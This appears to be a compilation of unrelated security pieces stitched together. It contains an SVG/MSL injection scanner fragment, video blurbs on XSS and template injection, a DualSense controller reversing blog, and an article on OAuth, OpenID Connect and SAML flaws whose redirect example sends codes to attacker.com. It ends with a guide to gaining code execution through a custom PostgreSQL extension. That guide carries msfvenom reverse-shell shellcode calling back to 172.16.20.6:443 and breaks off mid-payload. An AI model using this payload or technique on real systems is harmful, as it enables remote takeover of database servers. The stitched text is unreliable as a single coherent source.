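SHELL_META = set('`$;|&<>"')

# A start tag whose attribute values may themselves contain '>' or quotes.
START_TAG_RE = re.compile(r'<([A-Za-z_][\w:.-]*)((?:[^>"\']|"[^"]*"|\'[^\']*\')*)>', re.S)
ATTR_RE = re.compile(r'([\w:.-]+)\s*=\s*(?:"([^"]*)"|\'([^\']*)\')', re.S)
PROLOG_RE = re.compile(r'<\?.*?\?>|<!--.*?-->|<!DOCTYPE[^>]*>', re.S)


def root_tag(text):
    """Name of the first element, skipping the XML declaration, comments and DOCTYPE."""
    m = START_TAG_RE.search(PROLOG_RE.sub('', text))
    return m.group(1).lower() if m else None


def scan_svg(text):
    """Return human-readable findings; an empty list means nothing suspicious was seen."""
    findings = []
    root = root_tag(text)
    if root != "svg":
        # The MSL coder only needs the file to start with a tag it supports.
        findings.append(f"root element is <{root}>, not <svg>")
    for tag in START_TAG_RE.finditer(text):
        for name, dq, sq in ATTR_RE.findall(tag.group(2)):
            value = dq if dq else sq
            lname = name.lower()
            scheme = value.split(":", 1)[0].lower() if ":" in value else ""
            if lname in REFERENCE_ATTRS and scheme in INTERNAL_CODERS:
                findings.append(f"<{tag.group(1)} {name}> uses internal coder {scheme}: ({value})")
            if lname == "authenticate":
                # 'authenticate' has no meaning in SVG; it is the injection point in MSL.
                meta = "".join(sorted(SHELL_META & set(value)))
                note = f" with shell metacharacters {meta!r}" if meta else ""
                findings.append(f"<{tag.group(1)}> carries an authenticate attribute{note}")
    return findings


if __name__ == "__main__":
    for label, doc in (("poc.svg", POC_SVG), ("benign.svg", BENIGN_SVG)):
        print(label, scan_svg(doc) or ["clean"])
```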
  6. In this video, Filedescriptor introduces his Chrome Extension "Untrusted Types" that abuses Trusted Types and demonstrates how easy it is to find DOMXSS using it.

Untrusted Types GitHub repo: https://github.com/filedescriptor/unt...
Google's Firing Range: https://public-firing-range.appspot.com/
Prompt(1) to win: https://prompt.ml
  7. This video explores the world of Server-Side Template Injections. Primarily we'll look at Python with the Flask framework as an example, but the core ideas explained in the video are applicable to a wide set of languages and frameworks.

🐤 Twitter: https://twitter.com/PwnFunction
🎵 Track: Warriyo - Mortals (feat. Laura Brehm) NCS link: https://www.youtube.com/watch?v=yJg-Y...
  8. DualSense Reverse Engineering

Reading time ~6 min. Posted by Emmanuel Cristofaro on 23 November 2020. Categories: Fun, Hardware, Playstation, Reversing, Dual-pod-shock, Dualsense, Dualshock, Sony, Stutm

Ciao belli! On the 19th of November 2020, SONY finally released the new PlayStation 5 in the UK, a few days earlier in the US, Japan, and Canada. Of course, PlayStation 5 came together with a new Wireless Controller, this time named DualSense. I wanted to see if I could continue my PlayStation controller adventures on this new device, following on my previous work.

(Photo: a few SONY installations available in London for the release of the PlayStation 5.)

DualSense Wireless Controller

The DualSense Wireless Controller presents new features such as:

- Haptic feedback, vibration sense via actuators (no more rumble motors); these are the components that manage and control the movement mechanism.
- Adaptive triggers, intensified game experience interaction when force and tension are applied on buttons.
- A built-in microphone.
- More LEDs.

I bought it just for the sake of playing with it. The DualSense Wireless Controller. Yes, just the DualSense Wireless Controller.

(Photo: DualSense arrived.)

When using the DualSense via USB it was possible to hear sounds from the speaker. With the DualShock 4, this was not possible. The speaker of the DualSense works in Stereo mode. What a pity, the speaker of the previous controller, the DualShock 4, was in Mono mode and I loved it for this reason. The quality of the sound issued when playing blues reminded me of a vintage radio. One of those that are convenient to have while camping. I don’t know… there was some kind of magic to it.

(Videos: the speaker power while playing light music; music coming from the speaker.)

Teardown

Below is a little teardown of the DualSense Wireless Controller model CFI-ZCT1W.

(Photos: front, back, charger port, headset port, front mask, actuators, digital buttons, microphone, battery, PCB side B, PCB side A.)
I spent the last weekend reversing the DualSense Wireless Controller. Tests were conducted after connecting the DualSense to a host machine via a USB cable and, with a few lines of code, it was possible to read HID reports sent by the device.

```c
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>

int main(void)
{
    char *DS = "/dev/hidraw0";
    char bufRead[16];
    int fd, res, i;

    fd = open(DS, O_RDWR|O_NONBLOCK);
    if (fd < 0) {
        perror("open");
        return 1;
    }

    /* Get a report from the device */
    res = read(fd, bufRead, sizeof(bufRead));
    if (res < 0) {
        perror("read");
    } else {
        printf("read() read %d bytes:\n\t", res);
        for (i = 0; i < res; i++) {
            /* This will print out the part we are interested in */
            printf("%hhx ", bufRead[i]);
        }
        puts("\n");
    }
    close(fd);
    return 0;
}
```

The output generated by the above piece of code changed each time a button was pressed down. The buttons Square, Exe, Circle, and Triangle were associated with byte number 8, and its value changed every time one of those buttons was used.

- Square: 0x18
- Exe: 0x28
- Circle: 0x48
- Triangle: 0x88

Below some examples.

(Screenshots: Exe; Circle.)

I wrote a script and started sending a bunch of bytes at a time to the DualSense in order to understand how to control/use its functionalities.

(Image: the resulting breakdown.)

A few hours later, this resulted in me being able to intercept the pressed buttons and trigger LEDs and actuators. The full Proof of Concept is available on GitHub.

(Video: the result.)

Dual-Pod-Shock

Happy with the result I obtained in such a short time, I decided to work on the Dual-Pod-Shock project I had been working on last year and added the same functionalities to interact with the device while the music is playing. For more information about the Dual-Pod-Shock project refer to this page: https://orangecyberdefense.com/global/blog/sensepost/dual-pod-shock-emotional-abuse-of-a-dualshock/

With Dual-Pod-Shock it is now possible to use the new functionalities by pressing Square, Exe, Circle, and Triangle, one at a time. This action will also trigger the LED, which will change colour based on the button that is pressed.
Below the new functionalities implemented:

- Square: Decrease the volume (R: FF, G: 14, B: 93)
- Exe: Increase the volume (R: 00, G: 00, B: FF)
- Circle: Switch ON the motors (R: FF, G: 00, B: 00)
- Triangle: Switch OFF the motors (R: 00, G: FF, B: 00)

(Video: testing the new functionalities added.)

In order to play some music via Bluetooth, it was necessary to use SBC files. These files were generated by using a GStreamer plugin called SBCENC. With the first attempts, the results were good but the audio was a bit stuttery. Multiple tests were conducted to mitigate this problem. Finally, the problem was solved by converting the tracks from MP3 to SBC using the below command.

```sh
$ gst-launch-1.0 -q filesrc location=audiofilename.mp3 ! decodebin ! audioconvert ! audioresample ! sbcenc ! "audio/x-sbc,rate=32000,channels=2,channel-mode=dual,blocks=16,subbands=8,allocation-method=snr,bitpool=25" ! queue ! filesink location=audiofilename.sbc sync=false
```

Using the "snr" method instead of "loudness" the quality of the sound produced by the DualShock 4 seemed better. Below is what changed in terms of SBC headers.

```
// Before
9c 75 19
// After
9c 77 19
```

The updated script is available on GitHub. Note that this script was tested on Ubuntu 16.04 with kernel 4.4.0 and Raspberry OS with kernel 4.4.50+. If you have issues try to implement the CRC32 or patch your kernel.

(Video: the result.)

Thanks for reading. Proudly made by one of those lazy Italians. HAPPY HACKING! <1337

Source: https://sensepost.com/blog/2020/dualsense-reverse-engineering/
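An added example, not part of the post or of the Dual-Pod-Shock project, that decodes the two SBC header excerpts above using the frame-header layout from the Bluetooth A2DP specification, so the single-bit change between "9c 75 19" and "9c 77 19" reads as loudness to SNR and can be cross-checked against the caps string given to sbcenc.

```python
"""Decode the SBC frame header bytes quoted in the post above.

Layout (A2DP SBC frame header): byte 0 sync word 0x9C; byte 1 packs, MSB
first, sampling frequency (2 bits), block count (2), channel mode (2),
allocation method (1) and subband count (1); byte 2 bitpool; byte 3 CRC-8.
"""
SYNC_WORD = 0x9C
SAMPLING_RATES = {0: 16000, 1: 32000, 2: 44100, 3: 48000}
BLOCK_COUNTS = {0: 4, 1: 8, 2: 12, 3: 16}
CHANNEL_MODES = {0: "mono", 1: "dual", 2: "stereo", 3: "joint"}
ALLOCATION_METHODS = {0: "loudness", 1: "snr"}
SUBBAND_COUNTS = {0: 4, 1: 8}

# The two header excerpts from the post (three bytes each; the CRC byte was not shown).
HEADER_BEFORE = bytes.fromhex("9c7519")
HEADER_AFTER = bytes.fromhex("9c7719")


def parse_sbc_header(data):
    """Unpack an SBC frame header; raises ValueError on a bad sync word or short input."""
    if len(data) < 3:
        raise ValueError("need at least 3 header bytes")
    if data[0] != SYNC_WORD:
        raise ValueError(f"bad sync word 0x{data[0]:02x}")
    packed = data[1]
    header = {
        "rate": SAMPLING_RATES[packed >> 6],
        "blocks": BLOCK_COUNTS[(packed >> 4) & 0x3],
        "channel_mode": CHANNEL_MODES[(packed >> 2) & 0x3],
        "allocation_method": ALLOCATION_METHODS[(packed >> 1) & 0x1],
        "subbands": SUBBAND_COUNTS[packed & 0x1],
        "bitpool": data[2],
    }
    if len(data) >= 4:
        header["crc"] = data[3]
    return header


def header_diff(before, after):
    """Fields whose value changed between two parsed headers."""
    return {k: (before[k], after[k]) for k in before if k in after and before[k] != after[k]}


def gst_caps(header):
    """Render a parsed header as the caps string sbcenc is given in the post's pipeline."""
    channels = 1 if header["channel_mode"] == "mono" else 2
    return (f"audio/x-sbc,rate={header['rate']},channels={channels},"
            f"channel-mode={header['channel_mode']},blocks={header['blocks']},"
            f"subbands={header['subbands']},allocation-method={header['allocation_method']},"
            f"bitpool={header['bitpool']}")


if __name__ == "__main__":
    before, after = parse_sbc_header(HEADER_BEFORE), parse_sbc_header(HEADER_AFTER)
    print("changed:", header_diff(before, after))
    print("caps:", gst_caps(after))
```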
  9. Common Federated Identity Protocols: OpenID Connect vs OAuth vs SAML 2

Introduction

When it comes to federated identity there are three major protocols used by companies: OAuth 2, OpenID Connect, and SAML. In this article we will examine their security weaknesses and how they relate to each other. Before diving deep into these protocols, let's first clarify some concepts.

Federated Identity

Federated identity is a secure way to link the electronic identities of a user across multiple identity management systems. In other words, an application can authenticate a user without needing to collect and store the credentials, by using an identity management system that already knows the user's identity. The main advantage of this approach is that it makes it easier to centralize authentication/authorization in enterprises, so different internal applications don't need to manage users' credentials themselves. Also, it is simple and convenient for users since they don't need a unique username/password combination for every application.

Single Sign-On (SSO)

Single sign-on is a great way to simplify password management. It allows users to access multiple services/web applications with a single login. This means that once a user is logged into a service she automatically gains access to other services without having to re-submit credentials. For example, think of your Google account. Once you log in you can access YouTube, Google Ads, Google Analytics, or Gmail without being asked for your username and password over and over again.

Authentication vs. Authorization

Authentication and authorization are two different concepts that people often confuse. On a daily basis we interact with numerous computer devices and online services. Often we are required to confirm our identity to benefit from a personalized service or better security. We cannot simply provide a name; we also need to provide evidence to confirm our identity.
This is authentication, the process that confirms a user's identity based on one or more authentication factors. A factor can be something that the user owns (digital signature, ID card, security token), something that the user knows (password, PIN, secret answer) or what the user is (fingerprint, voice, retina scan).

Authorization has nothing to do with confirming a user's identity. Its purpose is to determine which resources a user should be able to access and what they should be allowed to do with those resources. For example, once you log into a community board as an administrator, the authorization process makes sure that you can access specific resources and functions (such as the admin control panel, or the edit/delete users' posts functions), while an unprivileged user won't be able to use those features. This process is useful in restricting free accounts from accessing premium features and preventing a user from modifying data that isn't theirs.

To recap, authentication is verifying the identity of a user while authorization is deciding which resources a user should be able to access. Now, let's discuss the similarities and differences between the most used federated identity protocols: OAuth 2.0, OpenID Connect, and SAML 2.0.

OAuth 2

OAuth 2 is an authorization framework that allows a user to grant external applications access to their data stored by another application (e.g., public profile, friends list, photos), without having to expose their credentials. To make things easier, let's consider the following example: you have just signed up on Gmail, but you want to import your contact list from your old Yahoo inbox. During this process you will see the pop-up window from Figure 1 asking you to allow a third-party service to access your contacts, profiles, and others; that is OAuth 2. By clicking "Agree" the Gmail app becomes authorized to access your Yahoo Mail data, but let's find out how the protocol (i.e. OAuth 2) works.

Figure 1: Third-party app asking for access.
OAuth 2 defines four roles:

- Resource owner: the user that can grant access to the protected resource
- Client: the application that requests access to a protected resource
- Resource Server: the server that hosts a protected resource
- Authorization Server: the server that authorizes the client to access a protected resource

In the previous example you are the resource owner and the Gmail application which tries to access your Yahoo Mail data is the client. Thus, api.mail.yahoo.com fulfills both the resource and authorization server roles.

To be able to delegate the authorization, OAuth 2 can use four different process flows known as authorization grant types:

- Authorization Code Grant Type
- Implicit Grant Type
- Resource Owner Password Credentials Grant Type
- Client Credentials Grant Type

In this article we will discuss the first two grant types as the others are rarely used. To gain access to the protected resource OAuth 2 follows a three-step process described in Figure 2.

Figure 2: Basic OAuth 2 workflow (Source: Auth0).

- First, the Client (application) spawns a browser window similar to the one from Figure 1 asking for the Resource Owner's authorization to proceed further. Once the Resource Owner approves the access the Client receives a verification code - a simple randomly generated string.
- The Client requests an Access Token from the Authorization Server by providing the verification code acquired in the previous step. If the verification code is correct the Authorization Server generates an Access Token and sends it to the Client.
- The Client makes an HTTP request to access the protected resource located on the Resource Server, including the Access Token in the request. If the Access Token is valid the Client is allowed to access the protected resource.

OAuth 2.0 vulnerabilities

With a search on HackerOne's platform you can see there are many vulnerabilities related to this technology (see Figure 3). So, what is the problem? Is OAuth 2 an insecure protocol? The answer is no.
Even though some things could be improved, OAuth 2 is secure. It is important to understand that OAuth 2 was built to eliminate the need for a specific insecure anti-pattern (i.e., exposing username and password to third parties during the authorization granting process). So, the problem is not the protocol itself, but rather how developers implement it. All the potential vulnerabilities that may arise due to faulty implementation of OAuth 2 have been well documented in RFC 6819, just a few months after the second major version of the protocol was released.

Figure 3: Vulnerabilities disclosed on HackerOne affecting OAuth instances

We won't discuss all the implementation vulnerabilities related to OAuth 2 but focus on the most prevalent. So, let's start with the first one: Account Takeover via Open Redirect.

Account Takeover via Open Redirect

The account takeover vulnerability that can affect OAuth 2 occurs due to improper sanitization of the redirect_uri parameter, allowing an attacker to hijack a victim's verification code/access token and take over their account. A typical request URL that asks for a validation code (step 2 from Figure 2) has the following structure:

https://login.webapp.com/oauth/authorize?clientid=123456&response_type=code&redirect_uri=https%3A%2F%2Fdashboard.webapp.com%2Fcallback

If the web application doesn't perform strict checks for the redirect_uri parameter, an attacker may be able to change the value to his own website. E.g.:

https://login.webapp.com/oauth/authorize?clientid=123456&response_type=code&redirect_uri=https%3A%2F%2Fattacker.com%2Foauth

If a user of webapp.com tries to log in using the above link his browser will send the verification code to the attacker's website.
The attacker can make a manual request to the original redirect_uri providing the victim's verification code:

https://dashboard.webapp.com/callback?code=<victim's verification code>

The web application will respond with an access token that can be used to access protected resources on behalf of the victim.

Mitigation

This vulnerability is easy to fix by implementing an allowlist on the redirect_uri parameter. However, make sure your filter matches exact values, otherwise it may be possible to bypass it using some tricks such as https://google.com%FF@dashboard.webapp.com.

Account takeover via CSRF

Another way to gain access to a victim's account is by using a CSRF attack. If you are not familiar with this type of attack yet you can check out HackEDU's hands-on CSRF lesson. The process is straightforward: first, the attacker initiates the OAuth workflow on example.com by choosing to log in with his social media account (e.g., Facebook). However, he will not complete the process and instead stop at step 4 (see Figure 2), just after the authorization code has been generated. The attacker creates a CSRF exploit that makes a request to:

https://example.com//auth/facebook/callback?code=<attacker's authorization code>

If the victim is logged in to example.com while visiting the attacker's website, the attacker's social media account will be linked to the victim's account.

Mitigation

CSRF attacks on OAuth endpoints can be prevented by appending the state parameter to the requests. This parameter is optional and acts similarly to traditional CSRF tokens.

Conclusion

If you are interested in learning more about OAuth 2.0 you can check out these great resources:

- The OAuth 2.0 Authorization Framework
- OAuth 2.0 Simplified
- OAuth 2.0 Threat Model and Security Considerations

Next we will discuss the differences and similarities between OAuth 2 and OpenID Connect.
OpenID Connect

OpenID Connect (OIDC) is an authentication protocol widely supported and used by Google, PayPal, Verizon, Microsoft, Salesforce, Amazon, and many others. If you ever used the "Log in with PayPal" feature when shopping online, that was OIDC - a web-based SSO service that allows a user to log in to a website/application by authenticating with an identity provider.

Despite its name, OpenID Connect is not based on the first version of the protocol (OpenID), but instead on the OAuth 2.0 specifications. More specifically, OpenID Connect extends OAuth 2 capabilities by implementing user authentication through a cryptographically secured token, sharing basic profile information about the user, as well as some other important features and additional security improvements.

As you can see in Figure 4, the OIDC and OAuth 2 workflows are similar. The main difference is that OIDC uses id_token for authentication purposes. This parameter, which contains information about the authenticated user, is sent back to the Client in JSON Web Token (JWT) format during the last step of the workflow, along with the access_token. JWT is a simple yet efficient way to transfer information between two parties securely. Information in the JWT is digitally signed, which means every trusted party that can handle a JWT can tell whether or not the token has been changed in any way. If you are not familiar with this technology you can check out HackEDU's hands-on lesson about JWT tokens and potential issues.

Figure 4: OpenID Connect Authentication workflow (Source: OneLogin Developers)

Since OpenID Connect is based on OAuth 2.0, some of the potential issues described in RFC 6819 - OAuth 2.0 Threat Model and Security Considerations are applicable here too. Also, the OIDC Security Considerations section specifies additional attack vectors and mitigations that should be considered. OIDC does contain improvements that solve a number of security issues related to OAuth 2.0.

OpenID Connect vs. OAuth 2.0

The most important difference between those two protocols is that OpenID is an authentication protocol, while OAuth 2.0 is an authorization protocol. The other differences and similarities are summarized in the following table:

| | OAuth 2.0 | OpenID Connect |
|---|---|---|
| Purpose | Authorization | Authorization, authentication and API access management |
| Use-case | Useful to protect APIs | New web or mobile applications, SSO for consumer apps |
| Limitations | Does not include authentication | |
| Format | JSON | JSON |
| Set-up difficulty | Easy to implement and use | Easy to implement and use |
| Scalability | Easy to scale | Easy to scale |

SAML 2.0

Security Assertion Markup Language (SAML) is an XML-based open standard which simplifies the authentication and authorization process between two parties: an Identity Provider and a Service Provider. In other words, SAML allows you to use a single pair of credentials to log into multiple web applications. In contrast to OpenID Connect, this protocol is often used in enterprise networks to give users access to specific 3rd party services.

SAML works by securely exchanging authentication and authorization data in XML format between the user, Service Provider, and Identity Provider. The Identity Provider is the system which verifies the user's identity. It performs the authentication process and sends the user's information as well as the access rights for the service to the Service Provider. Commonly used identity providers are Microsoft Active Directory, Okta, or OneLogin. The Service Provider is the system which receives and accepts information from the Identity Provider (e.g., Salesforce, Office365, Slack).

Once a user logs into a SAML instance the Service Provider requests authorization to access the user's data from the Identity Provider. The Identity Provider validates the user's credentials and tries to authenticate them. If the credentials are valid the Service Provider will receive the authorization and the user will be allowed to use the application.
All these transactions are performed through SAML assertions - XML documents that contain the authorization data. There are three types of assertions: authentication, attribute, and authorization assertion. In Figure 5, you can see SAML's workflow:

Figure 5: SAML workflow (source: https://www.mutuallyhuman.com/blog/choosing-an-sso-strategy-saml-vs-oauth2/)

Let's suppose that Steve wants to log into an internal Salesforce instance. Since the application uses SAML for authentication/authorization it starts by generating a SAML request. The browser redirects Steve to the Identity Provider (OneLogin for example) which also parses the SAML request and asks Steve for his credentials. If the credentials are valid then the Identity Provider creates the authentication response that includes Steve's identity information (email/username), signs it using an X.509 certificate, and sends it to the Service Provider (Salesforce app). During the last step the Service Provider (Salesforce) verifies the SAML assertions and extracts the relevant information about Steve. Now Steve can browse the application as a logged-in user.

SAML Vulnerabilities

A successful attack on a SAML instance can be a critical risk. In some cases an attacker can take over a victim's account or even get unauthorized access to the entire system. There are many potential vulnerabilities that you should check for, but you can speed up the process using different tools such as SAML Raider to quickly detect and test SAML misconfigurations. The vulnerabilities are due to improper implementation and not from the protocol itself. We'll briefly discuss two of the most common attacks on SAML: XML Signature Wrapping and a more recently discovered Authentication Bypass.

XML Signature Wrapping

Most SAML security issues are caused by the incorrect implementation of XML signature/encryption.

XML Signature Wrapping is an attack in which the structure of signed elements is modified so that the application logic evaluates the newly created elements. This allows an attacker to send arbitrary requests as a legitimate user.

Figure 6: Encrypted SOAP message protected by an XML Signature (Source: How to break XML encryption)

Figure 7: XML Signature Wrapping attack applied on an encrypted and signed message shown in Figure 6.

As you can see in Figure 7, the original Body element has been moved to the Header section, and a newly created Body was introduced. A vulnerable application finds the Body element in the Header section and verifies the XML Signature. If the signature is valid, it decrypts the EncryptedData element where the attacker introduced his malicious content. This attack is possible because the position of the signed elements was not fixed. This means that the signature is valid regardless of the location of the element, allowing an attacker to change the structure of the base document.

SAML Authentication Bypass

On February 27, 2018, Duo Security announced they found an authentication bypass vulnerability affecting several widely used SAML libraries. The issue allows an authenticated attacker to log in to other users' accounts without knowing their password. Below are the steps required for a successful attack:

- The attacker logs into his account (john@example.com.evil.com) and tries to access a resource.
- The Identity Provider generates a SAML assertion containing the user identifier (email address) and sends it back to the Service Provider.
- Now the attacker updates his email address in the SAML assertion, and adds an XML comment right before .evil.com: john@example.com<!---->.evil.com.
- Due to an XML parsing issue the SAML processing library ignores the comment and everything after it. Thus, the Service Provider processes john@example.com as the real email address of the attacker instead of john@example.com.evil.com.
As a result, the attacker is allowed to access the protected resource on behalf of john@example.com.

Mitigation

If you run an Identity Provider or Service Provider the best way to avoid this vulnerability is to make sure that you are not using a vulnerable SAML processing library (you can find a list of affected libraries here). Additionally, you can enable two-factor authentication to prevent an attacker from accessing the victim's account.

SAML vs. OpenID Connect vs. OAuth 2

SAML and OpenID Connect support both authentication and authorization while OAuth 2 was created to delegate the authorization process. SAML is definitely the hardest to implement but offers great flexibility. Since SAML only handles the information exchange between the Identity Provider and the Service Provider it allows the developer to choose how the users authenticate. The following table summarizes some of the differences and similarities between these three protocols.

| | OAuth 2.0 | OpenID Connect | SAML |
|---|---|---|---|
| Purpose | Authorization | Authorization, authentication and API access management | Authorization, authentication |
| Use-case | Useful to protect APIs | New web or mobile applications, SSO for consumer apps | Existing federations, enterprise SSO |
| Limitations | Does not include authentication | | Not designed for mobile or native applications |
| Format | JSON | JSON | XML |
| Set-up difficulty | Easy to implement and use | Easy to implement and use | Hard to implement |
| Scalability | Easy to scale | Easy to scale | Depends on implementation |
| Can invalidate access tokens? | Yes | Yes | No |
| Transport | HTTP | HTTP (GET & POST) | HTTP Redirect binding, HTTP POST binding, SAML SOAP binding, HTTP Artifact binding, SAML URI binding |

Source: https://www.hackedu.com/blog/analysis-of-common-federated-identity-protocols-openid-connect-vs-oauth-2.0-vs-saml-2.0
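Two implementation checks for the OAuth 2 and SAML issues the article describes, as an added example that is not HackEDU's code: an exact-match redirect_uri allowlist beside the host-substring check that the %FF@ trick defeats, a single-use state parameter bound to the browser session (the CSRF mitigation), and the NameID comment split from the 2018 SAML bypass shown with minidom, which keeps comments as nodes. The client id, hosts, session store and assertion fragment are constructed for the example.

```python
"""Redirect_uri allowlisting, the state parameter, and SAML NameID extraction."""
import hmac
import secrets
from urllib.parse import urlsplit
from xml.dom import minidom

# Constructed registration: client id -> the exact redirect URIs it registered.
REGISTERED_REDIRECTS = {"123456": {"https://dashboard.webapp.com/callback"}}


def redirect_uri_allowed_weak(client_id, redirect_uri):
    """Weak check: passes whenever a registered host appears anywhere in the value."""
    hosts = {urlsplit(r).hostname for r in REGISTERED_REDIRECTS.get(client_id, ())}
    return any(h in redirect_uri for h in hosts)


def redirect_uri_allowed(client_id, redirect_uri):
    """Exact match against the registered values, as the article's mitigation requires."""
    return redirect_uri in REGISTERED_REDIRECTS.get(client_id, ())


class AuthorizationFlow:
    """Server side of the state parameter: one random value per browser session."""

    def __init__(self):
        self._pending = {}  # session id -> state issued when the flow began

    def begin(self, session_id):
        state = secrets.token_urlsafe(32)
        self._pending[session_id] = state
        return state

    def callback_ok(self, session_id, returned_state):
        """True only if this session started a flow and its state came back unchanged."""
        expected = self._pending.pop(session_id, None)  # single use
        if expected is None or not isinstance(returned_state, str):
            return False
        return hmac.compare_digest(expected.encode(), returned_state.encode())


# Constructed assertion fragment carrying the comment trick from the article.
SAML_SUBJECT = (
    '<saml:Subject xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">'
    '<saml:NameID>john@example.com<!---->.evil.com</saml:NameID>'
    '</saml:Subject>'
)


def _name_id_node(xml_text):
    return minidom.parseString(xml_text).getElementsByTagName("saml:NameID")[0]


def name_id_first_text_node(xml_text):
    """Vulnerable pattern: the first text node stops where the comment starts."""
    return _name_id_node(xml_text).firstChild.data


def name_id_all_text(xml_text):
    """Correct pattern: join every text child and skip comment nodes."""
    node = _name_id_node(xml_text)
    return "".join(c.data for c in node.childNodes if c.nodeType == minidom.Node.TEXT_NODE)


if __name__ == "__main__":
    trick = "https://google.com%FF@dashboard.webapp.com"
    print("weak:", redirect_uri_allowed_weak("123456", trick),
          "exact:", redirect_uri_allowed("123456", trick))
    print("first node:", name_id_first_text_node(SAML_SUBJECT),
          "all text:", name_id_all_text(SAML_SUBJECT))
```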
  10. POSTGRESQL EXTENSION SHELLCODE EXECUTION

Postgresql allows us to create our own user defined functions (UDF) from existing or custom extensions (as DLL files on Microsoft Windows). This is particularly useful when it comes to gaining access to a target system when we control the SQL execution flow and have sufficient privilege to create and use Postgres UDFs.

REQUIREMENTS

LOCAL POSTGRESQL SERVER

To maximise the chance of succeeding in executing our own Postgres extension, it is very important to extract the version of the target Postgres server and install the exact same version in your own lab environment. In our case, we are targeting a PostgreSQL 13.1 64-bit.

It is also important to note the target Postgres architecture (in our case x86-64). Depending on the target architecture we will need to compile our custom extension either in 32 or 64 bit. Executing a 32-bit extension in a 64-bit instance of Postgres will simply fail. It is naturally the same with a 64-bit extension in a 32-bit instance of Postgres.

Installing Postgresql will also automatically extract the required C header files to build our own extension. This is why it is so important to compile our custom extension in an environment with the exact same version of Postgresql server available, since those files might change between two versions. Those C header files are generally located at this path:

C:\Program Files\PostgreSQL\<pg_version>\include

Where pg_version is the version of Postgresql we want to target (in our case, version 13.x).

C COMPILER

To compile our custom extension, we will need to have a C compiler installed and supporting the correct architecture. We will use the MinGW C 64-bit compiler that comes as an extra package of Cygwin. Feel free to use and adapt the build process with your favorite C compiler / IDE.

CREATE A VERY BASIC EXTENSION
minimal_extension.c

```c
#include "postgres.h" // Required postgres C header file
#include "fmgr.h"     // Required postgres C header file

#ifdef PG_MODULE_MAGIC
PG_MODULE_MAGIC; // Used by postgresql to recognize a valid extension
#endif

/* Define which functions can be used by postgres. In our case just "custom_func" */
PGDLLEXPORT Datum custom_func(PG_FUNCTION_ARGS);
PG_FUNCTION_INFO_V1(custom_func);

/* Our custom function code goes there */
Datum custom_func(PG_FUNCTION_ARGS)
{
    OutputDebugStringW(L"Hello from postgresql extension.");
    PG_RETURN_VOID();
}
```

The above code is the minimal required code to build our own Postgresql extension. On Microsoft Windows, Postgresql extensions are compiled as DLL files. We can compile our extension code using the following command:

```
x86_64-w64-mingw32-gcc.exe minimal_extension.c -c -o minimal_extension.o -I "C:\Program Files\PostgreSQL\13\include" -I "C:\Program Files\PostgreSQL\13\include\server" -I "C:\Program Files\PostgreSQL\13\include\server\port\win32"
```

The following are the required postgresql header file locations:

- C:\Program Files\PostgreSQL\13\include
- C:\Program Files\PostgreSQL\13\include\server
- C:\Program Files\PostgreSQL\13\include\server\port\win32

We then can build our DLL file using the following command:

```
x86_64-w64-mingw32-gcc.exe -o minimal_extension.dll -s -shared minimal_extension.o -Wl,--subsystem,windows
```

LOAD EXTENSION

We will use the PgAdmin tool to run our custom SQL queries to load and test our custom extension.

```sql
CREATE OR REPLACE FUNCTION custom_func() RETURNS void AS '<extension_path>', 'custom_func' LANGUAGE C STRICT;
```

Where extension_path is the location of our DLL file. A little popup should say that the query was successfully executed.

CALL EXTENSION FUNCTION

First let's open a privileged DebugView.exe instance to catch our OutputDebugString. Be sure to have the Capture > Capture Global Win32 option checked. We can now call our newly registered function from our custom extension using a basic SELECT statement.
```sql
SELECT custom_func();
```

We should now see our message in the DebugView window. Success!

We are now free to replace our basic OutputDebugString with more complex code and take advantage of Postgres extensions to gain privileged access on a target machine.

UNREGISTER FUNCTION

During the development process, we will often need to patch our custom extension. Our DLL file is currently loaded by the postgres process, so the file is locked and can't be patched as is. We can simply first unregister our custom function declaration using the following SQL statement:

```sql
DROP FUNCTION IF EXISTS custom_func;
```

Then open the Microsoft Service manager and restart the postgres service. This will unlock our DLL file.

SHELLCODE EXECUTION

We now know how to create and execute code from a custom extension through postgres extension capabilities. We will now create a new version of our extension to execute shellcode payloads. We will use Metasploit Msfvenom to create our payload, and use a classic technique to copy our payload to a newly allocated memory region and create a new thread starting code execution at this new location. This will prevent our current postgres thread from hanging when executing the payload.

—warning— Don't forget to replace the currently defined payload with your own version.
—end—

PgShellcodeExt.c

```c
#include "postgres.h"
#include "fmgr.h"

#ifdef PG_MODULE_MAGIC
PG_MODULE_MAGIC;
#endif

// msfvenom -a x64 --platform Windows -p windows/x64/shell_reverse_tcp LHOST=172.16.20.6 LPORT=443 -f c -v payload
unsigned char payload[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33"
"\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00"
"\x49\x89\xe5\x49\xbc\x02\x00\x01\xbb\xac\x10\x14\x06\x41\x54"
"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c"
"\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff"
